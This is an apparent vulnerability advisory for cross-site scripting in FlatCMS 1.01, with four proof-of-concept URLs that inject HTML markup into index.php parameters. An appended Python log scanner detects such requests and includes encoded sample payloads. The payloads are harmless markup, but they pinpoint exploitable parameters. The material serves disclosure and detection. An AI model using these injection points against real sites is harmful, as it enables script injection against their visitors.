FlatCMS version 1.01 is susceptible to multiple cross-site scripting flaws.
7b8f8bdcc7e2731c49b3096d3f99ac914f0836d360b46fccd53014f27c4c9975
[Description]: A PHP Website Engine not using any database. Support for different languages. Using the directory structure for menu creation. Directory names are the menu topics (categories), filenames beneath are menu items. XHTML compliant. Supports Modules like P
[version]: flatCMS 1.01
[vendor]: http://flatcms.org
[Vulnerability]: cross-site scripting (XSS)
[sploit]
http://[host]/[flatcms]/index.php?language=english&category=somedir&open=<h1> x1ng <h1/>
http://[host]/[flatcms]/index.php?language=<h1> x1ng <h1/>
http://[host]/[flatcms]/index.php?language=english&category=<h1> x1ng <h1/>
http://[host]/[flatcms]/index.php?language=english&module=guestbook&action=<h1> x1ng <h1>
X1ngBox |4t| gmail C0m
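
[Added example] The following log check is an added example, not part of the original advisory and not FlatCMS code. It flags requests to index.php in which any parameter used in the URLs above (language, category, open, module, action) carries something other than a plain directory or file name. The assumption that legitimate values match [A-Za-z0-9_.-], the Combined Log Format layout and the sample log lines are all constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Parameters named in the advisory's proof-of-concept URLs.
WATCHED = {"language", "category", "open", "module", "action"}
# Assumption: legitimate values are directory or file names, so anything
# outside this conservative character set is treated as suspicious.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_.-]*")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %253C) up to a fixed depth."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(target):
    """Return the watched parameters whose values are not plain names."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name in WATCHED and not SAFE_VALUE.fullmatch(fully_decode(value)):
            hits.append(name)
    return hits

def scan(log_lines):
    """Yield (request target, offending parameters) for flagged lines."""
    for line in log_lines:
        match = REQUEST.search(line)
        if match and "index.php" in match.group(1):
            hits = suspicious_params(match.group(1))
            if hits:
                yield match.group(1), hits

# Constructed sample access-log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /flatcms/index.php?language=english&category=somedir&open=page1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /flatcms/index.php?language=english&category=somedir&open=%3Ch1%3E%20x1ng%20%3Ch1/%3E HTTP/1.1" 200 5144',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /flatcms/index.php?language=%253Ch1%253E HTTP/1.1" 200 5100',
    '203.0.113.9 - - [01/Jan/2024:10:00:12 +0000] "GET /flatcms/index.php?language=english&module=guestbook&action=%3Ch1%3E HTTP/1.1" 200 5100',
]

if __name__ == "__main__":
    for target, params in scan(SAMPLE_LOG):
        print(params, target)
```

The same character-set check can serve as server-side input validation in front of the application, alongside HTML-encoding the values wherever they are echoed into the page.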